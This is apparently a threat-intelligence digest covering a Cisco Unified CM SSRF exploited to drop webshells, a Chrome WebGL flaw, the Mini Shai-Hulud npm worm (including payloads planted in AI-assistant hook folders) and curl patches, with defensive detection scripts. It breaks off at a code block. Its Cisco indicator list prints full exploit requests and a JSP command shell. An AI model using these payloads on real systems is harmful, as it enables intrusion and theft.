Cisco Unified CM Flaw Actively Exploited to Drop Webshells (CVE-2026-20230)

CVE-2026-20230, a server-side request forgery (SSRF) vulnerability in Cisco Unified Communications Manager (Unified CM), is actively being exploited to deploy webshells and achieve remote code execution. Threat intelligence firm Defused observed automated attacks originating from Tor, which leverage the WebDialer SSRF to install a rogue Apache Axis service. This service then writes a first-stage JSP file-writer, subsequently dropping a second-stage command-execution shell under `/platform-services/axis2-web/`. The vulnerability stems from improper input validation for specific HTTP requests, allowing unauthenticated, remote attackers to send specially crafted requests to write files to the underlying operating system, potentially leading to root privilege escalation. Cisco released patches for this flaw on June 3, 2026, acknowledging a proof-of-concept (PoC) exploit, which has since become public. Organizations unable to upgrade are advised to mitigate the risk by disabling the vulnerable WebDialer service.

Severity: Critical

Threat Details and IOCs

Malware: BlackBasta, Payouts King
CVEs: CVE-2024-20253, CVE-2026-20045, CVE-2026-20230
Technologies: Cisco Expressway Series, Cisco Finesse, Cisco Packaged Contact Center Enterprise, Cisco Unified Communications Manager, Cisco Unified Communications Manager IM and Presence Service, Cisco Unified Communications Manager Session Management Edition, Cisco Unified Contact Center Enterprise, Cisco Unified Contact Center Express, Cisco Unity Connection, Cisco Virtualized Voice Browser, Cisco Voice Operating System, Cisco Webex, Linux
Threat Actors: BlackBasta, JINX-0164, Payoutsking, TA4922
Attacker URLs: hxxps[://]github[.]com/HORKimhab/CVE-2026-20230, /platform-services/axis2-web/aaa.jsp?f=../../../../../../../common/log/taos-log-a/tomcat/webapps/platform-services/axis2-web/c.jsp&t=%3c%25%20if(%22123%22.equals(request.getParameter(%22pwd%22)))%7b%20java.io.InputStream%20in%20%3d%20Runtime.getRuntime().exec(request.getParameter(%22i%22)).getInputStream()%3b%20int%20a%20%3d%20-1%3b%20byte%5b%5d%20b%20%3d%20new%20byte%5b2048%5d%3b%20out.print(%22%3cpre%3e%22)%3b%20while((a%3din.read(b))!%3d-1)%7b%20out.println(new%20String(b))%3b%20%7d%20out.print(%22%3c%2fpre%3e%22)%3b%20%7d%20%25%3e, /platform-services/axis2-web/c.jsp?pwd=123&i=id, /webdialer/services/randomR11?method=nextInt&arg0=%3C%21%5BCDATA%5B%0A%3C%25if%28request.getParameter%28%22f%22%29%21%3Dnull%29%28new+java.io.FileOutputStream%28application.getRealPath%28%22%2F%22%29%2Brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29.getBytes%28%29%29%3B%25%3E+%0A%5D%5D%3E, /webdialer/Version.jws?wsdl
Victim Industries: Consumer Packaged Goods, Education, Financial Services, Government, Healthcare, Higher Education & Research, Information Technology, Insurance, Legal Services, Manufacturing, Media & Telecommunications, Oil & Gas, Professional Services, Retail, Software, Telecommunications
Victim Countries: Canada, Switzerland, United Kingdom, United States

Mitigation Advice

  • Identify all Cisco Unified Communications Manager (Unified CM) and Unified CM Session Management Edition instances and immediately upgrade them to a patched version as specified in the Cisco security advisory for CVE-2026-20230.
  • If patching of Cisco Unified CM cannot be performed immediately, disable the WebDialer service on all vulnerable instances to remove the attack surface for CVE-2026-20230.
  • On all Cisco Unified CM servers, immediately scan the filesystem for new or unexpected files in the `/platform-services/axis2-web/` directory, as this is a known indicator of compromise for CVE-2026-20230.
  • Update firewall or web application firewall (WAF) rules to block or alert on all inbound traffic from known Tor exit nodes to your public-facing Cisco Unified CM instances.
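One way to hunt in existing web-server logs for the exploitation chain described above (WebDialer SSRF carrying JSP source, then calls to dropped JSP files under `/platform-services/axis2-web/`). This is an added example, not code from the original digest or from Cisco; it assumes a combined-format access log whose request line retains the query string, and the sample log lines are constructed.

```python
"""Flag access-log lines matching the CVE-2026-20230 exploitation chain described
above: a WebDialer SSRF request carrying JSP source, then calls to dropped JSP files
under /platform-services/axis2-web/. Added example, not code from the digest or from
Cisco; it assumes a combined-format access log whose request line keeps the query
string, and the sample lines below are constructed."""
import re
from urllib.parse import parse_qs, unquote, unquote_plus, urlsplit

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
JSP_SOURCE = re.compile(r"<%|<!\[CDATA\[")  # JSP scriptlet or CDATA wrapper in a value
WEBDIALER_SERVICES = "/webdialer/services/"
AXIS2_WEB = "/platform-services/axis2-web/"


def classify(line, known_jsps=frozenset()):
    """Return (rule, client, target) when a log line looks like exploitation, else None.

    known_jsps is the set of JSP file names legitimately present under axis2-web on a
    known-good install (an assumption you must fill from a clean system); anything
    else requested there is reported as unknown.
    """
    m = REQUEST_RE.search(line)
    if not m:
        return None
    client = line.split(" ", 1)[0]
    target = m.group("target")
    parts = urlsplit(target)
    path = unquote(parts.path)  # normalise %2e%2e-style encodings in the path itself
    params = parse_qs(parts.query, keep_blank_values=True)
    # Second decode catches double-encoded payloads; it is a no-op on plain text.
    values = [unquote_plus(v) for vs in params.values() for v in vs]

    # Stage 1: SSRF to an Axis service whose argument carries JSP source
    if path.startswith(WEBDIALER_SERVICES):
        if any(JSP_SOURCE.search(v) for v in values):
            return ("webdialer-ssrf-jsp-payload", client, target)
    # Stage 2/3: dropped file-writer or command shell under axis2-web
    if path.startswith(AXIS2_WEB) and path.lower().endswith(".jsp"):
        if any("../" in v or "..\\" in v for v in values):
            return ("axis2-web-jsp-path-traversal", client, target)
        if any(JSP_SOURCE.search(v) for v in values):
            return ("axis2-web-jsp-source-in-request", client, target)
        if path[len(AXIS2_WEB):] not in known_jsps:
            return ("axis2-web-unknown-jsp", client, target)
    return None


def scan_log(lines, known_jsps=frozenset()):
    """Run classify over an iterable of log lines and return the hits in order."""
    hits = []
    for line in lines:
        hit = classify(line, known_jsps)
        if hit:
            hits.append(hit)
    return hits


# Constructed sample: one attacker session (198.51.100.7) plus benign traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [24/Jun/2026:10:15:01 +0000] "GET /webdialer/Version.jws?wsdl HTTP/1.1" 200 1422
198.51.100.7 - - [24/Jun/2026:10:15:03 +0000] "GET /webdialer/services/randomR11?method=nextInt&arg0=%3C%21%5BCDATA%5B%3C%25+out.print%28%22x%22%29%3B%25%3E%5D%5D%3E HTTP/1.1" 200 310
198.51.100.7 - - [24/Jun/2026:10:15:05 +0000] "GET /platform-services/axis2-web/aaa.jsp?f=../../../tmp/c.jsp&t=%3C%25%25%3E HTTP/1.1" 200 0
198.51.100.7 - - [24/Jun/2026:10:15:07 +0000] "GET /platform-services/axis2-web/c.jsp?pwd=123&i=id HTTP/1.1" 200 88
203.0.113.9 - - [24/Jun/2026:10:16:00 +0000] "GET /platform-services/axis2-web/index.jsp HTTP/1.1" 200 5120
203.0.113.9 - - [24/Jun/2026:10:16:02 +0000] "POST /ccmadmin/main.do HTTP/1.1" 302 0
"""

if __name__ == "__main__":
    for rule, client, target in scan_log(SAMPLE_LOG.splitlines(), {"index.jsp"}):
        print(f"{rule:32} {client:15} {target[:80]}")
```

Pair the hits with the filesystem check from the advice: a JSP name reported as unknown here should also show up as a new file under the axis2-web directory on the server.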

Compliance Best Practices

  • Establish a formal vulnerability management program that includes a complete asset inventory, regular scanning, and defined service-level agreements (SLAs) for patching critical systems like Cisco Unified CM.
  • Implement network segmentation to isolate critical voice and communication infrastructure, such as Cisco Unified CM, from general user and server networks, allowing only necessary and strictly-controlled traffic to and from these systems.
  • Implement a system hardening policy based on the principle of least functionality, ensuring all non-essential services, such as the WebDialer service on Cisco Unified CM, are disabled by default during server deployment and audited regularly.
  • Deploy a File Integrity Monitoring (FIM) solution on critical servers, including Cisco Unified CM, and configure it to alert on any file changes in application and system directories.
  • Implement a policy of default-deny egress traffic filtering for critical servers, including Cisco Unified CM, allowing only outbound connections to known, approved destinations over expected ports and protocols.

Sources

https://buaq.net/go-424971.html

https://buaq.net/go-425217.html

https://cyberpress.org/cisa-cisco-unified-communications-manager-ssrf/

https://cyberpress.org/cisco-communications-manager-ssrf/

https://cyberpress.org/cisco-unified-communications-manager-flaw/

https://cyberveille.esante.gouv.fr/alertes/cisco-cve-2026-20230-2026-06-04

https://darkwebinformer.com/ssrf-to-root-unauthenticated-file-write-flaw-in-cisco-unified-cm-cve-2026-20230/

https://exploit-intel.com/vuln/CVE-2026-20230

https://gbhackers.com/cisa-adds-actively-exploited-cisco-unified-cm-flaws-to-kev-catalog/

https://gbhackers.com/cisco-unified-communications-manager-flaw-2/

https://gbhackers.com/poc-exploit-released-for-cisco/

https://horizon3.ai/attack-research/vulnerabilities/cve-2026-20230/

https://latesthackingnews.com/2026/06/25/cisco-unified-cm-ssrf-exploited/

https://meterpreter.org/cve-2026-20230-vulnerability/

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssrf-cXPnHcW?vs_f=Cisco%20Security%20Advisory%26vs_cat=Security%20Intelligence%26vs_type=RSS%26vs_p=Cisco%20Unified%20Communications%20Manager%20Server-Side%20Request%20Forgery%20Vulnerability%26vs_k=1

https://securityonline.info/cisco-unified-cm-vulnerability-public-poc/

https://socradar.io/blog/cve-2026-20230-cisco-unified-cm-webdialer-ssrf/

https://sploitus.com/exploit?id=5581E532-E0A6-5210-9EB3-48C5BA4A5411

https://thehackernews.com/2026/06/cisco-patches-cve-2026-20230-in-unified.html

https://thehackernews.com/2026/06/cisco-unified-cm-flaw-exploited-after.html

https://www.bleepingcomputer.com/news/security/cisco-unified-cm-sme-flaw-cve-2026-20230-now-exploited-in-attacks/

https://www.bleepingcomputer.com/news/security/cisco-warns-of-critical-unified-cm-flaw-with-poc-exploit-code/

https://www.helpnetsecurity.com/2026/06/24/cisco-unified-cm-flaw-exploited-to-drop-webshells-cve-2026-20230/

https://www.hendryadrian.com/cisco-warns-of-available-poc-for-critical-unified-cm-vulnerability/

https://www.securitylab.ru/news/574110.php

https://www.securityweek.com/hackers-exploiting-cisco-unified-cm-vulnerability/

https://www.thehackerwire.com/cisco-unified-cm-unauthenticated-ssrf-to-root-privilege-escalation/

CVE-2026-13028: Critical Use-After-Free in Google Chrome WebGL Allows RCE

A critical use-after-free vulnerability, identified as CVE-2026-13028 with a CVSS v3.1 score of 9.6, exists within the WebGL component of Google Chrome. This flaw allows for remote arbitrary code execution and, specifically on Android, a sandbox escape, due to improper memory object lifecycle management. An attacker can exploit this by enticing a user to visit a specially crafted HTML page, requiring only simple user interaction and no prior authentication or elevated privileges. The attack complexity is low, and the vulnerability can lead to privileged access. Affected Google Chrome versions include those prior to 149.0.7827.197 on Windows and macOS, prior to 149.0.7827.196 on Linux, and prior to 149.0.7827.197 on Android. A patch is available, and users are advised to update to Google Chrome version 149.0.7827.197 or higher for Windows, macOS, and Android, and version 149.0.7827.196 or higher for Linux. While a patch exists, no workaround is available, and there is currently no public proof of concept or active exploitation.

Severity: Critical

Threat Details and IOCs

Malware: AryStinger, Cobalt Strike, Cobalt Strike Beacon, macOS.Gaslight, SharkLoader
CVEs: CVE-2026-13021, CVE-2026-13022, CVE-2026-13023, CVE-2026-13024, CVE-2026-13025, CVE-2026-13026, CVE-2026-13027, CVE-2026-13028, CVE-2026-13029, CVE-2026-13030, CVE-2026-13031, CVE-2026-13032, CVE-2026-13033, CVE-2026-13034, CVE-2026-13035, CVE-2026-13036, CVE-2026-13037, CVE-2026-13038, CVE-2026-2441
Technologies: Apple macOS, Google Android, Google Chrome, Linux, Microsoft Windows
Victim Industries: Healthcare
Victim Countries: France, India, United States

Mitigation Advice

  • Update all Google Chrome installations on Windows and macOS endpoints to version 149.0.7827.197 or later.
  • Update all Google Chrome installations on Linux endpoints to version 149.0.7827.196 or later.
  • Enforce an update for the Google Chrome application on all company-managed Android devices to version 149.0.7827.197 or later using your Mobile Device Management (MDM) solution.
  • Run a scan with your asset inventory or vulnerability management tool to verify that all Google Chrome instances on Windows, macOS, Linux, and Android are at or above the patched versions listed in the advisory.

Compliance Best Practices

  • Implement and configure an automated patch management policy for third-party applications, especially web browsers, to ensure critical security updates are deployed across all endpoints within 48-72 hours of release.
  • Deploy a DNS filtering or secure web gateway solution to block access to known malicious, uncategorized, and newly registered domains to reduce the risk of users accessing malicious web content.
  • Deploy and tune an Endpoint Detection and Response (EDR) solution to monitor for and alert on anomalous behaviors originating from browser processes, such as spawning a command shell, unexpected network connections, or file modification.
  • Develop and maintain a continuous security awareness training program that educates users on the dangers of clicking unsolicited links and how to report suspicious websites and emails.

Mini Shai-Hulud Worm Poisons LeoPlatform npm Packages to Steal Developer and CI/CD Secrets

A recent supply-chain attack, attributed to the Mini Shai-Hulud, Miasma, and Hades malware families, is actively poisoning npm packages within the LeoPlatform and RStreams ecosystems, extending its reach to source-repository compromises. This intrusion employs registry poisoning, install-time execution via the "Phantom Gyp" pattern using `binding.gyp` for arbitrary code execution, Bun-staged JavaScript loaders to bypass Node security hooks, and GitHub Actions abuse to steal runner-scoped secrets and inject malicious workflows. The malware targets a broad array of developer and CI/CD secrets, including `.env` files, npm and PyPI tokens, GitHub tokens, cloud provider credentials (AWS, Azure, GCP), Docker and Kubernetes configurations, SSH keys, Vault data, CI secrets, IDE and AI-agent configurations, Slack and Twilio tokens, and shell histories, while also probing for EDR and endpoint tooling and using locale guards for evasion. Collected secrets are encrypted and exfiltrated through the GitHub API, using a "dead-drop" approach in which commit messages or repository content serve as retrieval channels. The campaign also weaponizes developer workflows and IDE triggers, such as dropping payloads in `.claude` folders and invoking them via VS Code folder-open tasks, to achieve delayed, developer-initiated execution. Mitigation requires treating any environment with affected versions as compromised, preserving forensics, identifying all developer machines and CI runners, removing and rebuilding from known-good lockfiles, rotating all exposed credentials from a clean host, and auditing repositories for injected workflows, AI assistant hooks, specific payload files like `.github/setup.js` or `_index.js`, orphan branches, and unexpected Bun usage. Specific indicators of compromise, including SHA-256 hashes for malicious `binding.gyp`, `index.js`, `package.json` files, and npm tarballs, have been identified.

Severity: Critical

Threat Details and IOCs

Malware: CanisterWorm, dbmux, GlassWorm, hackerbot-claw, Hades, IronWorm, JS.Worm.ShaiHulud, kitty-monitor, Megalodon, Miasma, Miasma: The Spreading Blight, Miasma worm, Mini Shai-Hulud, Phoenix Locker, Python.Loader.Shai-Hulud, s1ngularity, SANDWORM_MODE, sha1-hulud, Sha1-Hulud, SHA1-Hulud, Sha1-Hulud: The Second Coming, Shai-Hulud, Shai-Hulud 2.0, Shai-Hulud 3.0, ShaiWorm, Shaulud, TeamPCP cloud stealer, TeamPCPCloudStealer, telemetry.js, The Spreading Blight, Vect, Vect 2.0, WastedLocker
CVEs: CVE-2019-5736, CVE-2020-10148, CVE-2022-0492, CVE-2023-29059, CVE-2024-21626, CVE-2024-3094, CVE-2025-10894, CVE-2025-30066, CVE-2025-55182, CVE-2025-59144, CVE-2025-59532, CVE-2025-59536, CVE-2025-6514, CVE-2026-21852, CVE-2026-22708, CVE-2026-33634, CVE-2026-42271, CVE-2026-45321, CVE-2026-45758, CVE-2026-46412, CVE-2026-48027
Technologies: 1Password, 3CX DesktopApp, Aider-AI Aider, Amazon Web Services, Amazon Web Services (AWS), Anthropic Claude, Anysphere Cursor, Apple macOS, Aqua Security Trivy, Arweave, Auto-GPT, Bun, Bundler, Checkmarx, Checkmarx KICS, CircleCI, CrewAI, CrowdStrike, Cursor, Dify, Docker, Git, GitHub, GitHub Actions, GitHub Copilot, GNU Privacy Guard, Google Cloud Platform, Google Gemini, Google Gemini CLI, gopass, HashiCorp Vault, JFrog, Kubernetes, Leo/RStreams, Linux, LiteLLM, Microsoft Azure AI, Microsoft Azure Functions, Microsoft Durable Task, Microsoft Entra ID, Microsoft GraphRAG, Microsoft .NET Framework, Microsoft Visual Studio, Microsoft Windows, Mistral AI, MongoDB Server, Node.js, npm, Nrwl Nx, OpenAI, OpenAI Codex, OpenCode, OpenSSH, Oracle MySQL, pnpm, PostgreSQL, PyPI, Python, Python Package Index, Python PyPI, Red Hat, Red Hat Cloud Services, Replit, RubyGems, SentinelOne, Sigstore, SolarWinds, Sonatype Nexus Repository, SSH, Stanford DSPy, Starlette, StepSecurity, StepSecurity Harden-Runner, TanStack, The Linux Foundation Sigstore, UiPath, Vapi.ai, Vapi SDK, VMware Carbon Black, WeaveDB, Yarn, Zoom
Threat Actors: APT38, Bluenoroff, CageyChameleon, CipherForce, CryptoCore, DangerousPassword, DeadCatx3, DragonForce, Elitexp, EvilCorp, GlassWorm, GoldWinter, HasanBroker, IndrikSpider, Lapsus, Lazarus, LazarusGroup, LeeryTurtle, MASAN, Megalodon, Miasma, NICKELGLADSTONE, PCPcat, PersyPCP, PG_MEM, ReplicatingMarauder, ResoluteXBF, Sandworm, SapphireSleet, SHADOW-WATER-058, ShellForce, ShinyHunters, StardustChollima, Ta444, TeamPCP, TGR-CRI-1135, TGRCRI1135, TraderTraitor, UNC1069, UNC4899, UNC6780
Attacker Countries: North Korea, Russia, South Africa
Attacker IPs: 103[.]75[.]11[.]59, 142[.]11[.]206[.]73, 154[.]47[.]29[.]12, 160[.]119[.]64[.]3, 170[.]62[.]100[.]245, 209[.]159[.]147[.]239, 83[.]142[.]209[.]0
Attacker Emails: claude@users[.]noreply[.]github[.]com, github-actions@github[.]com
Attacker Domains: aab[.]sportsontheweb[.]net, agent[.]stepsecurity[.]io, api[.]anthropic[.]com, api[.]github[.]com, api[.]stepsecurity[.]io, app[.]stepsecurity[.]io, check[.]git-service[.]com, checkmarx[.]zone, github[.]com, git-service[.]com, git-tanstack[.]com, graph[.]microsoft[.]com, help[.]sonatype[.]com, login[.]microsoftonline[.]com, models[.]litellm[.]cloud, nsa[.]cat, oob[.]moika[.]tech, registry[.]npmjs[.]org, scan[.]aquasecurtiy[.]org, sfrclak[.]com, tdtqy-oyaaa-aaaae-af2dq-cai[.]raw[.]icp0[.]io, telemetry[.]api-monitor[.]com, temp[.]sh, t[.]m-kosche[.]com, webhook[.]site
Attacker URLs: api[.]anthropic[.]com[:]443/v1/api, api[.]anthropic[.]com/v1/api, check[.]git-service[.]com/rope.pyz, github[.]com/liuende501, github[.]com/oven-sh/bun/releases, github[.]com/oven-sh/bun/releases/download/bun-v1.3.13, github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-*.zip, hxxp[://]169[.]254[.]169[.]254/latest/api/token, hxxp[://]169[.]254[.]169[.]254/metadata/identity/oauth2/token, hxxps[://]api[.]anthropic[.]com[:]443/v1/api, hxxps[://]api[.]github[.]com/graphql, hxxps[://]api[.]github[.]com/repos/liuende501/nemean-hydra-34343/contents/results/results-1780551069887-0.json, hxxps[://]api[.]github[.]com/search/commits?q=IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner, hxxps[://]api[.]github[.]com/search/commits?q=thebeautifulmarchoftime, hxxps[://]api[.]github[.]com/user, hxxps[://]api[.]github[.]com/user/repos, hxxps[://]github[.]com/liuende501, hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/, hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-linux-x64-baseline.zip, hxxps[://]graph[.]microsoft[.]com/v1.0/me, hxxps[://]login[.]microsoftonline[.]com/, hxxps[://]registry[.]npmjs[.]org/-/npm/v1/oidc/token/exchange/package/, hxxps[://]registry[.]npmjs[.]org/-/v1/search?text=maintainer:{username}, hxxps[://]registry[.]npmjs[.]org/-/whoami, hxxps[://]temp[.]sh, hxxp[:]//169.254.169.254/latest/meta-data/iam/security-credentials/, hxxps[:]//api.anthropic.com/v1/api, hxxps[:]//api.github.com, hxxps[:]//api.github.com/search/commits?q=firedalazer, hxxps[:]//fulcio.sigstore.dev, hxxps[:]//github.com/oven-sh/bun/releases/download/bun-v1.3.13/, hxxps[:]//github.com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{os}-{arch}.zip, hxxps[:]//github.com/oven-sh/bun/releases/download/bun-v1.3.14/, hxxps[:]//login.microsoftonline.com/, hxxps[:]//upload.pypi.org/legacy/, hxxps[:]//webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7, registry[.]npmjs[.]org/-/npm/v1/tokens, registry[.]npmjs[.]org/-/whoami, 
tor[:]//api/agent
Victim Industries: Academia, Artificial Intelligence, Biotechnology, Blockchain, Cloud Infrastructure, Cryptocurrency, Education, Financial, Financials, Financial Services, Government, Healthcare, Information Security, Information Technology, Life Sciences, Manufacturing, Pharmaceuticals, Professional Services, Public Sector, Scientific Research, Software, Technology Hardware, Telecommunications
Victim Countries: Austria, Belgium, Bulgaria, Canada, China, Croatia, Cyprus, Czech Republic, Denmark, Estonia, European Union, Finland, France, Germany, Greece, Hungary, Iran, Ireland, Israel, Italy, Latvia, Lithuania, Luxembourg, Malta, Netherlands, Poland, Portugal, Romania, Slovakia, Slovenia, Spain, Sweden, United Kingdom, United States

Mitigation Advice

  • Scan all developer workstations and CI/CD runners for files matching the SHA-256 hashes provided in the article, including '32d1bc728d8e504952083a6adc488c309a401c7df4dc8f47b382ce32e4aebe21' for 'binding.gyp'.
  • Immediately initiate a rotation of all developer and CI/CD secrets, including credentials for GitHub, npm, AWS, Azure, GCP, SSH keys, and any other secrets stored in .env files or CI/CD environments.
  • Audit all project `package-lock.json`, `yarn.lock`, and other lockfiles to identify any dependencies on the malicious npm packages listed in the article, such as those in the LeoPlatform and RStreams ecosystems.
  • Audit all source code repositories for suspicious artifacts, including unexpected branches named 'snapshot-*', malicious GitHub Actions workflows (especially those named 'Run Copilot'), and unexpected files like `_index.js` or `.github/setup.js`.
  • Scan developer workstations for malicious IDE and AI-assistant hooks, specifically looking for executable scripts within `.claude`, `.cursor`, `.gemini`, or `.vscode` directories inside project folders.
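The repository-side checks in the mitigation advice above, combined into one audit pass. This is an added example, not code from the original digest or from any vendor; the only hash it carries is the `binding.gyp` SHA-256 quoted in the advice, the remaining rules are heuristics, and the sample checkout it writes is constructed for the demo.

```python
"""Audit a repository checkout for the Mini Shai-Hulud / Miasma artefacts named in the
mitigation advice above: known-bad hashes, gyp command expansions ("Phantom Gyp"),
dropped payload files, suspicious workflows, IDE/AI-assistant hooks, snapshot-*
branches and lifecycle scripts that invoke Bun. Added example, not code from the
digest or any vendor; the sample tree below is constructed for the demo."""
import hashlib
import json
import os
import re
import tempfile

# The one hash quoted in the advice (binding.gyp); extend from your own intel feed.
KNOWN_BAD_SHA256 = {"32d1bc728d8e504952083a6adc488c309a401c7df4dc8f47b382ce32e4aebe21"}
HASHED_NAMES = {"binding.gyp", "index.js", "package.json"}
IDE_HOOK_DIRS = {".claude", ".cursor", ".gemini", ".vscode"}
SCRIPT_EXT = {".sh", ".js", ".mjs", ".cjs", ".py"}
GYP_CMD_EXPANSION = re.compile(r"<!@?\(")  # node-gyp runs these at configure time
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")


def _read(path):
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return fh.read()


def snapshot_branches(root):
    """Loose branch refs named 'snapshot-*' (packed-refs would need the same check)."""
    heads = os.path.join(root, ".git", "refs", "heads")
    names = os.listdir(heads) if os.path.isdir(heads) else []
    return sorted(n for n in names if n.startswith("snapshot-"))


def audit_repo(root):
    """Return (rule, relative_path) findings for the checkout at root."""
    findings = [("snapshot-branch", "refs/heads/" + b) for b in snapshot_branches(root)]
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in (".git", "node_modules")]
        rel_dir = os.path.relpath(dirpath, root)
        parents = set() if rel_dir == "." else set(rel_dir.split(os.sep))
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.normpath(os.path.join(rel_dir, name))
            ext = os.path.splitext(name)[1]
            if name in HASHED_NAMES:
                with open(full, "rb") as fh:
                    if hashlib.sha256(fh.read()).hexdigest() in KNOWN_BAD_SHA256:
                        findings.append(("known-bad-hash", rel))
            if name == "binding.gyp" and GYP_CMD_EXPANSION.search(_read(full)):
                findings.append(("binding-gyp-command-expansion", rel))
            if name == "_index.js" or rel == os.path.join(".github", "setup.js"):
                findings.append(("payload-file-name", rel))
            if rel.startswith(os.path.join(".github", "workflows") + os.sep) and ext in (".yml", ".yaml"):
                text = _read(full)
                if re.search(r"^name:\s*['\"]?Run Copilot", text, re.M):
                    findings.append(("workflow-run-copilot", rel))
                if "pull_request_target" in text:
                    findings.append(("workflow-pull-request-target", rel))
            if parents & IDE_HOOK_DIRS:
                if os.access(full, os.X_OK) or ext in SCRIPT_EXT:
                    findings.append(("ide-hook-script", rel))
                if name == "tasks.json" and "folderOpen" in _read(full):
                    findings.append(("vscode-folder-open-task", rel))
            if name == "package.json":
                try:
                    scripts = json.loads(_read(full)).get("scripts") or {}
                except (json.JSONDecodeError, AttributeError):
                    scripts = {}
                if any(re.search(r"\bbunx?\b", str(scripts.get(k, ""))) for k in LIFECYCLE):
                    findings.append(("package-json-bun-lifecycle", rel))
    return findings


def build_sample_repo(root, infected):
    """Write a constructed sample checkout; the infected variant carries each artefact."""
    def put(rel, text, exe=False):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(text)
        os.chmod(path, 0o755 if exe else 0o644)
    put("src/index.js", "module.exports = () => 42;\n")
    put(".git/refs/heads/main", "0" * 40 + "\n")
    if not infected:
        put("package.json", json.dumps({"name": "demo", "scripts": {"test": "node t.js"}}))
        return
    put("package.json", json.dumps({"scripts": {"postinstall": "bun run .github/setup.js"}}))
    put("binding.gyp", '{"targets": [{"target_name": "noop", "sources": ["<!(node .github/setup.js)"]}]}')
    put(".github/setup.js", "// constructed stand-in for a dropped loader\n")
    put(".github/workflows/copilot.yml", "name: Run Copilot\non:\n  pull_request_target:\n")
    put(".claude/hooks/post-tool.sh", "#!/bin/sh\necho hook\n", exe=True)
    put(".vscode/tasks.json", '{"tasks": [{"runOptions": {"runOn": "folderOpen"}}]}')
    put(".git/refs/heads/snapshot-20260624", "0" * 40 + "\n")


def demo(infected=True):
    """Audit a constructed sample checkout and return the set of rules that fired."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_repo(tmp, infected)
        return frozenset(rule for rule, _ in audit_repo(tmp))
```

Run `audit_repo()` against each real checkout; any finding should be treated as a trigger for the secret rotation and rebuild steps in the advice rather than as proof on its own.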

Compliance Best Practices

  • Implement a supply chain security tool (e.g., Socket, Snyk) to automatically scan all third-party dependencies for malicious indicators, such as unexpected install scripts in `binding.gyp` files, before they are added to projects.
  • Configure process execution monitoring on CI/CD runners and developer endpoints to create alerts for anomalous behavior, such as a package manager process (e.g., npm, yarn) spawning an unexpected runtime (e.g., bun) or network utility (e.g., curl).
  • Establish and enforce a security policy for CI/CD pipelines that prohibits the use of high-risk GitHub Actions triggers like `pull_request_target` with code checkouts from pull requests, and mandates the principle of least privilege for all workflow tokens.
  • Tune Endpoint Detection and Response (EDR) policies to specifically detect and alert on suspicious process chains originating from package managers and build tools, such as `npm` or `node-gyp` executing shell commands or downloading files.
  • Establish a corporate policy that restricts the installation and execution of non-standard JavaScript runtimes, such as Bun, on developer workstations and CI/CD runners unless there is a documented business justification.
  • Develop and implement a recurring security awareness training program for developers focused on supply chain attack vectors, including how to vet third-party packages and identify suspicious repository files and configurations.

Sources

https://about.gitlab.com/blog/shai-hulud-copycat-campaign-targets-python-developers/

https://arstechnica.com/security/2026/06/dozens-of-red-hat-packages-backdoored-through-its-offical-npm-channel/

https://arstechnica.com/security/2026/06/for-the-2nd-time-in-weeks-microsoft-packages-laced-with-credential-stealer/

https://blog.polyswarm.io/miasma-expands-software-supply-chain-attacks-through-compromised-ci/cd-infrastructure

https://buaq.net/go-420430.html

https://buaq.net/go-422065.html

https://buaq.net/go-422396.html

https://buaq.net/go-423642.html

https://buaq.net/go-424746.html

https://cyberpress.org/binding-gyp-targets-npm-maintainers/

https://cyberpress.org/dbmux-malware-targets-developers/

https://cyberpress.org/ironworm-targets-developer-secrets/

https://cyberpress.org/microsoft-packages-spread-stealer/

https://cyberpress.org/red-hat-cloud-npm-packages-compromised/

https://cyberpress.org/red-hat-confirms-supply-chain-breach/

https://cyberpress.org/shai-hulud-abuses-npm-payloads/

https://cyberpress.org/shai-hulud-attack-compromises-23-pypi-packages/

https://cyberscoop.com/teampcp-breaks-open-source-software-trust-model/

https://gbhackers.com/20-leo-rstreams-packages/

https://gbhackers.com/73-microsoft-packages-weaponized/

https://gbhackers.com/attackers-exploit-docker-kubernetes/

https://gbhackers.com/dozens-of-npm-packages-via-binding-gyp/

https://gbhackers.com/ironworm-npm-attack/

https://gbhackers.com/malicious-npm-package-dbmux/

https://gbhackers.com/shai-hulud-malware-campaign-abuses-23-pypi-packages/

https://gbhackers.com/shai-hulud-worm-poisons-leoplatform/

https://hackread.com/miasma-malware-red-hat-packages-github-account/

https://isc.sans.edu/diary/rss/33060

Curl Patches 18 Vulnerabilities, Including 25-Year-Old Authentication Bypass Flaw (CVE-2026-8932)

The open source data transfer tool and library curl has been updated with patches for 18 vulnerabilities, four rated medium and 14 low severity, the highest number of CVEs resolved in a single curl update. Among them is CVE-2026-8932, an mTLS connection reuse flaw introduced 25 years ago in version 7.7 (March 22, 2001): libcurl could reuse an existing connection even after the client certificate or private key settings had changed, so a libcurl application could send a request over a connection that was authenticated with a different client identity, which amounts to an authentication bypass. Other resolved vulnerabilities include credential confusion (CVE-2026-8926), a double free (CVE-2026-8925), use-after-free bugs (CVE-2026-9080 and CVE-2026-10536), and improper host validation (CVE-2026-9547). The flaws were found through a community effort, underscoring how hard it is to discover security issues in curl, a tool used by over 30 billion devices for data transfer; no public reports of in-the-wild exploitation have been confirmed.
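Connection-pool matching is the root of the flaw described above. The following Python model is written for this digest and is not libcurl's code: it contrasts a pool whose reuse key omits the client certificate and key (so a request carrying a second identity inherits a connection authenticated as the first) with one that folds a fingerprint of that material into the key; hostnames and file names are constructed.

```python
"""Model of the CVE-2026-8932 flaw class: connection reuse that ignores mTLS identity.
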